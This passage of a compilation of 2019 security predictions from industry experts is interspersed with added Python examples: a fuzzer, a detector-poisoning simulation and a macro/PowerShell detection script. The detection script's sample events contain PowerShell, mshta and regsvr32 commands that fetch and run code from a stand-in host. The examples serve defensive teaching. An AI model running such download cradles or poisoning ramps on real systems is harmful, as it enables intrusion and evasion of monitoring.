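    byte), then random_rounds inputs with 1-4 random bit flips, insertions or deletions."""
    for pos in range(len(seed)):
        for value in INTERESTING:
            buf = bytearray(seed)
            buf[pos] = value
            yield bytes(buf)
    for _ in range(random_rounds):
        buf = bytearray(seed)
        for _ in range(rng.randint(1, 4)):
            op = rng.randrange(3)
            if op == 0 and buf:
                buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
            elif op == 1:
                buf.insert(rng.randrange(len(buf) + 1), rng.randrange(256))
            elif buf:
                del buf[rng.randrange(len(buf))]
        yield bytes(buf)


def fuzz(target, seed: bytes, random_rounds: int = 2000, rng_seed: int = 1) -> dict:
    """Run target over mutated inputs. Returns {exception type: first input that raised it},
    ignoring ValueError, which is the target's defined rejection path."""
    crashes = {}
    rng = random.Random(rng_seed)
    for candidate in mutations(seed, rng, random_rounds):
        try:
            target(candidate)
        except ValueError:
            continue
        except Exception as exc:        # a crash: anything the parser did not mean to raise
            name = f"{type(exc).__module__}.{type(exc).__name__}"
            crashes.setdefault(name, candidate)
    return crashes


SEED = b"R\x02\x03abc\x02xy"   # constructed well-formed input: two entries, b"abc" and b"xy"

if __name__ == "__main__":
    for name, inp in fuzz(parse_record, SEED).items():
        print(f"{name} on input {inp!r}")
```

The deterministic sweep alone finds the planted bug: setting the second entry's length byte to 0xFF leaves only two bytes for the four-byte extended length. Real fuzzers add coverage feedback, a corpus and crash triage on top of exactly this skeleton; an unhandled exception in Python corresponds to the out-of-bounds read or assertion failure the quote lists for native code.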
5G increases IoT system exploits and botnet recruitment: "As the number of IoT devices rises (up to about 7 billion worldwide at the moment), and we deploy 5G to connect everything, we’ll see a huge increase in the use of IoT devices for DDoS attacks, phishing, ransomware, and cryptomining. The Reaper IoT botnet of 2017 was an example of the power that criminals can amass with IoT devices. With the addition of 5G and increased compute power, the risk is only going to become greater." – Stan Lowe, CISO, Zscaler.
5G will spur new security concerns: "5G mobile networks are on the horizon ….these new networks will bring with them a host of new security concerns. 5G will spur further growth of internet-connected devices—Ericsson already estimates that there could be 3.5 billion IoT-enabled devices by 2023—providing would-be intruders with new endpoints to attack. Security for 5G is still evolving with the standard, and it is complex enough that security will require several layers. 5G networks can be split into uniquely purposed slices, each virtual network slice could demand unique security capabilities. Developers will need to consult IoT security professionals to help identify new ways to shore up the network, and ensure that security measures are implemented as the technology develops, instead of having to address issues retrospectively." – Jason Soroko, chief technology officer of IoT, Sectigo.
GDPR bounty hunters arrive: "We haven’t seen even the tip of the iceberg when it comes to hackers targeting big firms with this type of extortion. ...The angle these attackers take is by extorting their data and telling the victim that they now have two choices, a) pay the ICO fine of up to €20 million or b) pay the hackers fee of far less and not have to deal with reputation damage." – Jake Moore, cyber security expert, ESET UK.
GDPR - we’ll see the first big fine: "The period of grace is drawing to a close, and the new year will see the ICO taking its first high-profile scalp over treatment of personally identifiable information. That will set the precedent by which all further cases are judged – letting companies know along the way just how strictly enforced the rules are going to be, and how heavy the fines." – David Francis, head of security, KCom.
GDPR questioned by big business: "Businesses will begin to question GDPR (following the first major fine) and, by 2020, we predict up to 75 percent of new business applications will have to make the hard decision of choosing between compliance and security." – Bharat Mistry, principal security architect, Trend Micro.
GDPR to bite: "2019 will see the GDPR really cut its teeth, both from a fining perspective and from a court case point of view. Supervisory authorities...have already begun issuing fines and enforcement notices under GDPR, and we expect to see this activity increase significantly during next year. There is a strong likelihood that we’ll see a maximum fine (€20 million or four percent of total revenue) dealt to an organisation, given some of the investigations that are currently ongoing." – Sam Humphries, senior product marketing manager, global markets and compliance, Rapid7.
GDPR - breaches appear to rise: "As GDPR continues to be implemented, we will see a perceived rise in the number of breaches. However, we will be uncertain if this should be attributed to an increase in breach disclosure or an increase in actual breaches, or that breaches against personal data have become financially attractive." – Martin Jartelius, CSO, Outpost24.
GDPR’s negative impacts: "Many companies and organisations are now frustrated with GDPR and spend virtually all their resources to attain formal compliance. The problem is that in pursuit of the paper-based compliance, they omit critical aspects of practical cyber-security. Consequently, we may see more data breaches, as scant cyber-security resources...cannot effectively cover both practical security and compliance requirements. Even if compliance and security are tangential, contiguous and even intertwined areas, they are still different and cannot replace each other." – Ilia Kolochenko, CEO, High-Tech Bridge.
Hacktivism / influence operations expand beyond the political realm: "Hacktivism, more commonly known as influence operations, is when consumers are directed toward a certain stance or feeling on a given issue using false or compromised information. As information and influence operations leveraging a cyber-component have seemingly exponentially increased over the last few years, this most likely is going to continue and expand to issues existing outside of the political realm. Whether leveraging compromised data or strictly propaganda or false information, all variety of actors can use information operations to further their personal or organisational goals. A competing retailer could post scores of negative reviews for a competitor in hopes of ultimately driving down that organisation’s business. Similarly, a nation-state could minimise competition for its domestic companies by conducting information operations targeting foreign organisations." – ThreatConnect research team.
Hypervisor - first serious attack predicted: "Hypervisors and other cloud service provider-controlled infrastructure needs to be hardened to give security-conscious enterprises the confidence that they remain in control of their data. One problem technically for Full Drive Encryption is that when running on a virtual machine with keys in the virtual memory, it’s possible that a hypervisor could take a snap-shot of the memory of the virtual machine, and make a copy of the disk encryption keys. The solution is to use the hardware based memory encryption that not even a compromised hypervisor could access in plain text." – Garry McCracken, VP technology, WinMagic.
Identity and access management will continue to be a major investment: "As cloud adoption hits critical mass and organisations become more comfortable with, or at least accepting of, multiple SaaS applications (many of which will likely be purchased without IT involvement)...organisations will wake up to the significant cost implications of poorly or incorrectly assigned permissions in a per user licensing model, which will lead to a much more complex identity environment across multiple application providers. This in turn will drive a need for automated tools and delegated administration workflows to ensure IT operations teams don’t become swamped with leavers, movers and joiners requests. Password breaches and phishing attacks will continue to be the biggest threat to most organisations as attackers take advantage of the migration of internal systems and data to external providers. Most users still will ignore good guidance and advice and use the same password everywhere." – Adam Louca, chief technologist for security, Softcat.
Insurance against breaches to grow: "GDPR on top of the existing financial and reputational pressures... will start driving more process maturity as breach insurance starts to be more sophisticated in an actuarial sense. They'll look for specific processes and procedures to be in place to determine rates, and I think that in turn will start to drive better auditing and hopefully better security." – Bill Lummis, technical programme manager, HackerOne.
Insurance - More organisations cyber-insurance savvy: "More and more conversations among peers will start to focus on cyber insurance. ...does it pay or is it even ethical? These (questions) will need to be addressed in 2019." – Jake Moore, cyber security expert, ESET UK.
Insurance rate hike forecast: "Cyber insurance rates will go up because of the increased payouts and risk." – Dmitri Alperovitch, CTO, CrowdStrike.
Intelligence and insight get even bigger: "I’m not just talking about cutting edge developments in areas such as AI and Machine Learning but adding increased intelligence to the whole IT estate. More and more solutions now offer telemetry that can help with predictive maintenance and support ... the big trends moving forward will be turning that into insights and using it to improve operational efficiency and user experience." – Craig Lodzinski, chief technologist for developing technologies at Softcat.
Internet will be held hostage by attackers: "A hacktivist collective or nation-state will launch a coordinated attack against the infrastructure of the internet in 2019. The protocol that controls the internet (BGP) operates largely on the honour system, and a 2016 DDoS attack against hosting provider Dyn showed that a single attack against a hosting provider or registrar could take down major websites. …. the internet itself is ripe for the taking by someone with the resources to DDoS multiple critical points underpinning the internet or abuse the underlying protocols themselves." – WatchGuard Threat Lab.
Internet - crisis of confidence in the public internet: "In 2019, we expect a growing number of organisations to reconsider their dependence on the public internet for their operations. Cyber-crime is now a common occurrence, and for a variety of business and regulatory reasons the protection of customer data has been escalated from an important concern to a top priority for businesses. For this reason, savvy organisations will begin planning how to migrate their critical data from storage solutions that rely on the public internet, like the cloud, to more secure "cold" networks that are significantly more difficult for hackers to access. Many organisations have moved their operations and storage needs to the cloud and have deemed this a forward-thinking initiative. However, like any system connected to the public internet, cloud networks can be vulnerable to cyberattacks, ransomware, denial of service, and many other malicious exploits. For this reason, any organisation that is serious about protecting its data and other assets must consider moving its online operations onto a more secure private and isolated network." – Phil Celestini, chief security and risk officer, Syniverse.
IOT attack surface and velocity of attacks increases: "The Internet of Things ... literally every facet of our lives is now online... – everything has an IP address. If it’s online, it is susceptible to attack and the larger the attack surface, the greater the real-world consequences will be when things do go wrong. ….any major threat to critical infrastructure will be powered by the devices in our homes….exploiting the woefully inadequate security on smart home devices." – Sean McGrath, privacy expert and cybersecurity advocate, BestVPN.com.
IOT acceleration: "This inevitably will see more hacks and more botnets of previously inert designs. AI turning on humankind is likely to be led by fridges and smart doorbells rather than by Cyberdyne Systems Hunter Killers!" – Stephen Gailey, solutions architect, Exabeam.
Internet of Things (IoT) attacks take advantage of lack of regulation: "As lawmakers scramble to come up with a way to regulate the IoT space, attackers will continue to capitalise on their inherent weaknesses. Hackers are becoming better at hijacking IoT products like baby monitors, surveillance cams and other home appliances. And connected medical devices are far from safe either. In fact, body implants that support wireless connectivity may lead to the first ransomware attacks where you need to pay or die. Sound wild? Just remember that, in 2013, former US Vice President Dick Cheney asked his doctors to disable the wireless function in his pacemaker to thwart the potential of terrorists hacking it." – Bitdefender.
IOT devices drive data collection, privacy, and security concerns: "High profile data breaches and eroding faith in major tech companies like Facebook and Twitter will result in a consumer base more privacy minded. Data breaches or abuse of user data, particularly from companies building smart devices, will further erode this trust and allow opportunities for brands that are privacy and security minded to differentiate themselves from the competition. Building consumer trust will be a necessary part of any digital strategy and campaign." – Gabe Morazan, director of product, digital governance, Crownpeak.
Increase in IoT attacks: "The growth in (IOT) devices will very likely mirror the growth in IoT-based malware and has already been evidenced in recent years by the likes of Mirai, IoTroop/Reaper and more recently Sharebot attacking routers. The pace of innovation and deployment of network connected systems has outstripped the necessary safeguarding measures – and even more worrying, it is often very difficult to retrofit cyber-security to some of these IoT devices." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
IOT goes cellular: "Another noteworthy trend in the IoT landscape, manufacturers are jumping on the cellular bandwagon, gradually moving their IoTs from WiFi to LTE and from IPv4 to IPv6. While this shift promises increased security, it will likely open up a new can of worms since it’s relatively new ground for the IoT ecosystem." – Bitdefender.
IoT plays catch up on security: "IoT devices or cloud projects are built to do specific things, which can lack security controls, or default to unsecured methods. Which, once traced out, can be difficult or even impossible to rectify. In 2019, more IoT devices and apps will flood the tech markets, and security will continue to play catch up as complexities grow. Security teams need to understand what makes these devices tick before they can wrap security around them, protecting these interactions before information is sent out to insecure areas like the internet. The more security is considered and built-into these devices and processes, the better off companies will be, but it could be a while before security bridges the innovation gap between itself and the rest of technology." – Zach Malone, senior engineer, FireMon.
IOT physical injuries expected: "I expect we will see an increase in physical injuries directly related to the IoT enablement of devices...with remote, and voice enabled functions they become potentially more dangerous. There is an ever increasing probability that these devices will be used as entry points by malicious actors to further compromise corporations for data breaches." – Deral Heiland, IoT research lead, Rapid7.
Iran retaliates: "Iran will launch attacks on the US in retaliation for sanctions." – Dmitri Alperovitch, CTO, CrowdStrike.
MacOS attacks on the rise: "Apple’s share of the desktop market is rising, and malware designed to infect Macs is growing along with it. We project an increase in the number of attacks targeting Mac users, something we are already beginning to see in our internal telemetry. Our data shows not just new macOS-specific malware, but also macOS-specific mechanisms and tools designed to capitalise on Macs post-breach. We’ve already seen this in past APTs that housed Mac-specific components." – Bitdefender.
Machine learning will be tricked: "Machine learning can still be confused or "fuzzed." ...tricked into thinking something is normal and allow access, or even create a DOS by feeding misinformation. …. it can be used as another point of attack or another way to blind an adversary." – Reuven Harrison, CTO, Tufin.
Machine learning will be poisoned: "Machine learning … can also be exploited by cyber-adversaries. By targeting the machine learning process, cyber-criminals will be able to train devices or systems to not apply patches or updates to a particular device, to ignore specific types of applications or behaviours, or to not log specific traffic to evade detection." – Derek Manky, chief, security insights & global threat alliances, Fortinet.
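One way to see both of these predictions (a model "tricked into thinking something is normal", and a model trained to ignore the traffic it should log) is a boiling-frog attack on an anomaly detector that keeps learning from unlabelled data. The block below is an added example, not Tufin's or Fortinet's code: the detector, the per-host outbound-traffic figures and the attacker's ability to estimate what the model currently considers normal are all constructed assumptions made for the example.

```python
import random
import statistics


class ZScoreDetector:
    """Flags a value whose z-score against the training window exceeds `threshold`.
    With online=True every accepted value is appended to a sliding window, i.e. the model
    keeps retraining on what it has just seen; that feedback loop is the poisoning surface."""

    def __init__(self, baseline, threshold=3.0, window=30, online=True):
        self.history = list(baseline)[-window:]
        self.threshold, self.window, self.online = threshold, window, online

    def stats(self):
        return statistics.mean(self.history), statistics.stdev(self.history)

    def observe(self, value) -> bool:
        mean, std = self.stats()
        anomalous = (value - mean) / std > self.threshold
        if self.online and not anomalous:
            self.history = (self.history + [value])[-self.window:]
        return anomalous


def clean_baseline(days=30, mean=100.0, jitter=3.0, seed=42):
    """Constructed training data: MB/day sent out by one host, roughly 100 +/- 3."""
    rng = random.Random(seed)
    return [mean + rng.gauss(0, jitter) for _ in range(days)]


def boiling_frog(detector, days):
    """Attacker who can estimate what the model currently considers normal (for instance from
    the alerts they do and do not trigger) sends just under the alarm line every day, so each
    day's traffic is learned as normal and tomorrow's line sits a little higher."""
    flagged = 0
    for _ in range(days):
        mean, std = detector.stats()
        flagged += detector.observe(mean + 2.0 * std)
    return flagged


def run_scenario(ramp_days=200):
    base = clean_baseline()
    online = ZScoreDetector(base, online=True)      # retrains continuously
    frozen = ZScoreDetector(base, online=False)     # baseline fixed on the vetted clean period
    flagged_during_ramp = boiling_frog(online, ramp_days)
    exfil = online.stats()[0]                       # final burst sized to the poisoned "normal"
    return {
        "baseline_mean": statistics.mean(base),
        "poisoned_mean": exfil,
        "flagged_during_ramp": flagged_during_ramp,
        "online_flags_exfil": online.observe(exfil),
        "frozen_flags_exfil": frozen.observe(exfil),
    }


if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(f"{name}: {value}")
```

The ramp never trips the online detector, because every day's value is chosen from the detector's own statistics, yet after a few months the "normal" it has learned is several times the real baseline and a burst of that size passes silently. The frozen copy, trained once on a vetted period, still flags it. Freezing is not the whole answer (real traffic drifts), but the example shows the rule: do not let an unlabelled stream the adversary can influence retrain the model that polices that stream without a gate such as human review, a held-out reference period, or bounds on how far the baseline may move per retraining.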
Macros and fileless attacks will increase: "Attacks leveraging Microsoft Office macros will increase in number and scope. Macros are a feature, not a bug, as the old adage goes, which makes them the perfect bait for victims prone to social engineering scams – where the attacker convinces the victim to essentially partake in their own abuse. We expect fileless attacks – such as those leveraging PowerShell and other system-bound formats like reg, mshta etc. – to also increase in scope in the year to come." – Bitdefender.
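Detection logic for the macro-to-script-host chain the quote describes, run over constructed process-creation events: an Office process spawning PowerShell, mshta or regsvr32; a `-EncodedCommand` argument decoded (base64 of UTF-16LE) so the download cradle inside it becomes visible; mshta pointed at a URL or inline script; and regsvr32 loading a scriptlet. This is an added example rather than Bitdefender's code; the event format (`timestamp|parent|image|command line`) and the sample lines are invented for the example, and the documentation range 198.51.100.0/24 stands in for a real host.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# -EncodedCommand and the common abbreviations PowerShell accepts; the value is base64(UTF-16LE)
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
STEALTH_RE = re.compile(r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noprofile\b|-noni\b", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|iwr\b|invoke-webrequest|iex\b")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if there is none."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: str) -> list:
    """Apply the rules to one process-creation event "timestamp|parent|image|commandline"."""
    _, parent, image, cmdline = event.split("|", 3)
    parent, image, cmd = parent.lower(), image.lower(), cmdline.lower()
    findings = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append(f"office-spawn: {parent} -> {image}")
    if image in {"powershell.exe", "pwsh.exe"}:
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            findings.append(f"encoded-powershell: {decoded}")
        visible = cmd + " " + (decoded or "").lower()     # match on what the shell will run
        if STEALTH_RE.search(cmdline) and CRADLE_RE.search(visible):
            findings.append("download-cradle")
    if image == "mshta.exe" and re.search(r"https?:|vbscript:|javascript:", cmd):
        findings.append("mshta-remote-or-inline-script")
    if image == "regsvr32.exe" and "scrobj.dll" in cmd:
        findings.append("regsvr32-scriptlet")
    return findings


def scan(events) -> dict:
    """Map timestamp -> findings for every event that triggered at least one rule."""
    report = {}
    for event in events:
        findings = analyse(event)
        if findings:
            report[event.split("|", 1)[0]] = findings
    return report


# Constructed sample events (not real telemetry). The encoded command is built here so the
# sample stays readable; 198.51.100.0/24 is a documentation address range.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/p.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "2019-01-07T09:12:01Z|explorer.exe|WINWORD.EXE|WINWORD.EXE /n invoice.docm",
    f"2019-01-07T09:12:09Z|WINWORD.EXE|powershell.exe|powershell.exe -nop -w hidden -enc {ENCODED}",
    "2019-01-07T09:12:10Z|WINWORD.EXE|mshta.exe|mshta.exe http://198.51.100.7/x.hta",
    "2019-01-07T09:13:00Z|explorer.exe|powershell.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    "2019-01-07T09:13:30Z|EXCEL.EXE|regsvr32.exe|regsvr32.exe /s /n /u /i:http://198.51.100.7/s.sct scrobj.dll",
]

if __name__ == "__main__":
    for ts, findings in scan(SAMPLE_EVENTS).items():
        print(ts, findings)
```

The parent/child rule is the one that matters most: a legitimate administrator's scheduled PowerShell under explorer.exe is left alone, while any script host launched by an Office process is suspicious regardless of its arguments. Decoding the encoded command matters because attackers rely on the base64 blob defeating keyword matching on the raw command line; in production the same rules would run over Sysmon event ID 1 or PowerShell script-block logging rather than the pipe-delimited lines used here.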
Mobile attacks on the upsurge: "Fintech services are paving the way to a very profitable new trend for hackers, particularly in the mobile space. The more money they manage on behalf of their users, or the tighter the integration with traditional banking systems, the more attention they will get from cybercrooks who will likely develop new threats targeting these specific services in 2019." – Bitdefender.
Multi-factor authentication hits the mainstream: "... particularly in the small and medium business market….(which) trickles down from the top. Single factor log-ins with overused passwords have been a nightmare for CISOs for years and the boards are finally waking up to new technology, such as personal keys." – Jake Moore, cyber security expert, ESET UK.
Network-level exploits will enter the limelight next year: "They will likely be hyped by social media, if history is any indication. And researchers will have to devote considerable resources to analysing hardware-based implants, hardware backdoors, and hardware design flaws, as well as supply chain compromises in software." – Bitdefender.
Network threat detection returns: "We’ll see the industry start to open its arms back up to network-based threat detection. With the explosion of IoT and the increasing interest and drive for BYOD amongst organisations, network-based threat detection will continue to be important, providing vital security and behaviour related data, to offer visibility that endpoint technology can’t." – SecureAuth.
North Korea still attacking banks: "(It) will continue its financially-motivated attacks on banking institutions and, as its charm offensive is likely to end next year, it may resume destructive attacks in South Korea." – Dmitri Alperovitch, CTO, CrowdStrike.
Objects repurposed: "As organisations ramp up their use of AI to identify unusual activity, cyber-criminals will use more innovative and malicious tactics to ‘blend in’ in 2019. By repurposing standard computing objects for reasons other than their intended purposes – such as unconventional file extensions or online storage services – the threat actor’s arsenal will evolve significantly, and enable them to intelligently camouflage within the corporate network. In 2019, as cyber-criminals look to infiltrate sites under the radar, it’s imperative that enterprises implement comprehensive security solutions that are able to spot disguised profiling attempts." – Bharat Mistry, principal security architect, Trend Micro.
Old threats remain: "The biggest threats to enterprise data assets are the same ones we were worried about last year – and even a decade ago: data protection, compliance, breach avoidance, and – worst case scenario – incident response and remediation. Organisations must create user-friendly policies and procedures and build a maximum level of education and awareness, and ensure sensitive and valuable data remains encrypted at all times." – Jon Fielding, managing director, EMEA, Apricorn.
OT/IT convergence will result in the cyber-physical destruction of critical infrastructure: "The concept of Operational Technology (OT) and Information Technology (IT) convergence isn’t new, but as the attack surface continues to increase, so too does the likelihood of an attack successfully causing a severe physical impact. Prior to this convergence, attacks on IT had a relatively limited impact on the physical world—stolen credit card numbers and compromised personal data." – Myles Bray, VP EMEA, ForeScout.
Passwordless society arrives: "Having more human signals such as biometrics, usage analytics and device recognition will remove the reliance on simple and repeat passwords, and in turn, better secure systems. In addition, organisations should move to a discrete and modern identity system that removes any reliance on personal information, such as passwords, to increase security. This will ensure safety as stolen personal information would become worthless on the black market, acting as deterrent to hackers." – Jesper Frederiksen, VP, Okta.
Perimeter-based approaches to network security will evolve: "The new WAN landscape next year will demand an elastic edge to extend protection beyond physical and static infrastructure for people, mobile and connected devices on the move." – Todd Kelly, CSO, Cradlepoint.
Privacy breaches & IOT botnets increase, less blockchain interest: There will be a "drastic increase in attention around privacy-related breaches. At least two major botnets discovered on IoT/embedded devices and a falloff in interest for blockchain-related companies/initiatives." – Cody Brocious, security researcher, HackerOne.
Privacy is dead when service is free: "When there is a free online service or application, consumers often have a false assumption the information they share is private. Such free services monetise information and sell it for financial gain. It is a business after all. In 2019, organisations will need to draw a clear line on data sharing and protecting users." – SecureAuth.
Privacy - NO new digital privacy policies expected in US: "US government will NOT adopt any new digital privacy policies despite the recent congressional hearings with Twitter, Facebook, Google etc." – Kevin Lee, trust and safety architect, Sift Science.
Quantum computing puts pressure on crypto-agility: "Next year will see the emergence of the future of security – crypto-agility. As computing power increases, so does the threat to current security protocols. But one notable example here is encryption, the static algorithms of which could be broken by the increased power. Crypto-agility will enable businesses to employ flexible algorithms that can be changed, without significantly changing the system infrastructure, should the original encryption fail. It means businesses can protect their data from future threats including quantum computing, which is still years away, without having to tear up their systems each year as computing power grows." – Jason Hart, CTO, data protection at Gemalto.
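What crypto-agility looks like in code: a token format that carries its algorithm and key identifiers inside the authenticated data and dispatches through a registry, so moving from one algorithm to another is a rotation step rather than a rewrite, old tokens keep verifying while flagged as deprecated, and a token relabelled to claim a retired algorithm is rejected. This is an added example, not Gemalto's code; the algorithm names, token layout, key identifiers and keys are assumptions made for the example, and HMAC stands in for whichever primitive (signature, KEM, cipher) actually has to be swapped.

```python
import base64
import hashlib
import hmac

# Algorithm registry: adding or retiring an algorithm is a table change, not a code change.
ALGORITHMS = {
    "hmac-sha1": hashlib.sha1,
    "hmac-sha256": hashlib.sha256,
    "hmac-sha3-256": hashlib.sha3_256,
}


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text)


class AgileMac:
    """Self-describing tokens "alg.keyid.payload.tag". The alg and keyid fields are covered
    by the MAC, so a token cannot be rewritten to claim a weaker algorithm or another key."""

    def __init__(self, keys: dict, alg: str, key_id: str):
        self.keys = keys                      # key id -> key bytes
        self.current = (alg, key_id)          # what protect() issues today
        self.accepted = {alg}                 # what verify() still trusts
        self.deprecated = set()               # accepted for old tokens, flagged on every use

    @staticmethod
    def _tag(alg: str, key: bytes, key_id: str, payload: bytes) -> bytes:
        header = f"{alg}:{key_id}:".encode()
        return hmac.new(key, header + payload, ALGORITHMS[alg]).digest()

    def protect(self, payload: bytes) -> str:
        alg, key_id = self.current
        tag = self._tag(alg, self.keys[key_id], key_id, payload)
        return ".".join([alg, key_id, _b64(payload), _b64(tag)])

    def verify(self, token: str):
        """Return (payload, alg, is_deprecated); raise ValueError on any failure."""
        try:
            alg, key_id, body, tag = token.split(".")
        except ValueError:
            raise ValueError("malformed token")
        if alg not in self.accepted or key_id not in self.keys:
            raise ValueError(f"algorithm {alg!r} or key {key_id!r} not accepted")
        payload = _unb64(body)
        expected = self._tag(alg, self.keys[key_id], key_id, payload)
        if not hmac.compare_digest(expected, _unb64(tag)):
            raise ValueError("bad tag")
        return payload, alg, alg in self.deprecated

    def rotate(self, alg: str, key_id: str) -> None:
        """Start issuing with a new algorithm/key; a superseded algorithm stays verify-only."""
        if alg not in ALGORITHMS or key_id not in self.keys:
            raise ValueError("unknown algorithm or key")
        if alg != self.current[0]:
            self.deprecated.add(self.current[0])
        self.current = (alg, key_id)
        self.accepted.add(alg)

    def retire(self, alg: str) -> None:
        """Stop accepting an algorithm entirely once no live tokens depend on it."""
        self.accepted.discard(alg)
        self.deprecated.discard(alg)


def is_rejected(mac: AgileMac, token: str) -> bool:
    try:
        mac.verify(token)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    keys = {"k2018": b"\x11" * 32, "k2019": b"\x22" * 32}   # constructed keys, not real ones
    mac = AgileMac(keys, "hmac-sha1", "k2018")
    old = mac.protect(b"order=42;amount=100")
    mac.rotate("hmac-sha256", "k2019")                        # the "original encryption failed" step
    print(mac.verify(old))                                    # still valid, flagged deprecated
    print(mac.protect(b"order=42;amount=100"))                # issued under the new algorithm
```

Two details carry the security argument. The algorithm name is inside the MAC input, so an attacker who relabels a token as `hmac-sha1` gets a tag mismatch rather than a downgraded verification; and `retire` is a separate, later step from `rotate`, because the window in which old tokens are still honoured is exactly the window an attacker has to exploit the weak algorithm, and it should be closed deliberately once the last legacy token has expired.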
Ransomware rise: "Ransomware attacks against vulnerable components of smart city implementations will increase. Cities will be forced to invest in cybersecurity defences to minimise future attacks." – Forrester.
Ransomware damages expected to climb to US$ 11.5 billion: "I expect ransomware to become more sophisticated and less targeted. Distributed, non-specific attacks against technologies rather than organisations will continue to grow. Organisations will need to strengthen their security postures if they are to avoid suffering significant financial, operational and reputational damage." – Shannon Simpson, cyber-security and compliance director, Six Degrees.
Ransomware plateaus - remains a constant threat: "The most profitable form of malware, ransomware …. is no longer growing – it’s plateauing. (It)... has taken a back seat to cryptojacking in the past year as bad actors developed a taste for stealing computing power to generate digital currency while flying under the radar. But an even heftier factor behind ransomware’s stagnation is the emergence of dedicated solutions aimed directly at thwarting this form of malware. There will always be new versions of ransomware, some more complex than others and some harder to catch, but we don’t expect ransomware to take on much bigger proportions." – Bitdefender.
Ransom-hacking due to GDPR: "It has been suggested that some companies would rather pay a ransom to the cyber-criminals to recover their data, rather than admit the attack to the regulator and be hit with a penalty. We expect that 2019 will see both heavier implementation of the regulation, and a rise in ransom-hacking too." – Jose Miguel Esparza, head of threat intelligence at Blueliv.
Ransomware fatigue needs to be resisted: "It’s crucial that businesses don’t let this fatigue overwhelm them, but continue to do everything they can to prepare. If as much time went into ransomware protection and recovery as people spend talking about the dangers of attacks, businesses would find themselves much better prepared overall!" – Caroline Seymour, director, product marketing, Zerto.
Regulation encourages innovation in Europe: "Companies in Europe plan to adopt emerging technologies (hyperconverged infrastructure, container technology, 3D printing, serverless computing, edge computing, artificial intelligence, VR, and blockchain) at a much faster rate (than N America). GDPR ... (serves as) an impetus for companies to innovate." – Spiceworks research.
Regulation improved through government and security company cooperation: "...Government and security companies starting to work together to improve regulations to protect companies and individuals. ….Organisations have shown they cannot be trusted with users’ data because it is not secured properly and ends up available to be exploited easily by attackers. GDPR ... other countries will follow suit in 2019. Email-borne attacks on individuals will increase (and) put increasing pressure on social networks and other platforms, as individuals attempt to gain more control over the information available about them online. The response has to include better articulation and a choice upfront about what an individual chooses to expose. Governments will begin to regulate exactly how many personal details organisations can request from individuals, reducing the risk of attacks such as account takeover by cutting back on the amount of data being collected." – BJ Jenkins, president & CEO, Barracuda Networks.
Rock star CIOs or congery of Wizards?: "Gartner believes that Artificial Intelligence in 2019 will be defined by a small clique of ‘wizards’ whose talents won’t scale in the organisation. Infosys Consulting begs to differ: 2019 will be the age of the Rockstar CIO who orchestrates AI across the organisation and manages to capture substantial business value. As AI becomes ever-more central to strategic and operational success, CIOs will have to relinquish their backroom roles and take centre stage – whether they like it or not." – John Gikopoulos, global head for automation and artificial intelligence (AI), Infosys Consulting.
ROI - security teams will need to prove their worth with data: "The security operations teams of today are focused on combating threats, but the team of the future is going to have to prove it with data. In the coming year, we’re going to see more CEOs and boards asking their CISO and security teams to demonstrate the value that they are providing. This means that it will be essential for the CISO to have a way to measure the success of the security team. Think about it like the HR or Finance department: reporting, dashboarding, data storage, aggregation and analysis, and the ability to answer executives’ questions on KPIs quickly are all requirements. In the past, this hasn’t been a practice for the cyber-security side of business, but in the year ahead it will become more prevalent for security teams to be expected to have reporting at their fingertips." – Adam Vincent, CEO and co-founder, ThreatConnect.
Security awareness training improves with automation: "We’ll see security awareness training solutions evolve to provide further automation. This will go beyond making it possible for customers to download everything they need for a single campaign. Automation would ... allow programme administrators to simply select a complete programme from a library after indicating the type of programme and number of campaigns they want, and then everything would be automatically set up and scheduled for the year. Ultimately, this will make it possible for organisations to get their annual security awareness program taken care of in a meaningful, well thought-out way and will allow administrators to focus more on using the data from the results of the campaigns to build a risk profile of the organisation." – Dennis Dillman, VP, product management, PhishLine, Barracuda Networks.
Security by design takes a front seat: "Instead of going through security rules one by one, and needing specific details to work with the rules, security will move towards orchestration and refining things via tagging; like a hashtag on Twitter. These will become the frontrunners for designing policies and security interactions. At the moment, technology is becoming more virtualised – and companies are spinning things up and down in the cloud all the time. But, you need to know the implications of these changes immediately, otherwise data is vulnerable somewhere, or an application won’t function correctly. It sounds like an arduous process, but if you have a general tag with a set of rules attached, you can spin up a virtualised server in the cloud for a specific project without a problem by just properly tagging it – you don’t need to modify your security policy manually as you go." – Zach Malone, senior engineer, FireMon.
Security, Risk, and Trust and Safety Team demand rises: "Budgets for these teams will grow faster than their peers in Legal, Finance and Operations." – Kevin Lee, trust and safety architect, Sift Science.
Security specialist needed by everyone: "Everyone will need a team of application security specialists. But they can’t have them, because "the market" is drained. This gives rise to the proliferation of MSSPs and consultancies, but also hopefully a shift to focus on usability and decision support in security technology, enabling non-security experts to make educated decisions based on advice by their support systems." – Martin Jartelius, CSO, Outpost24.
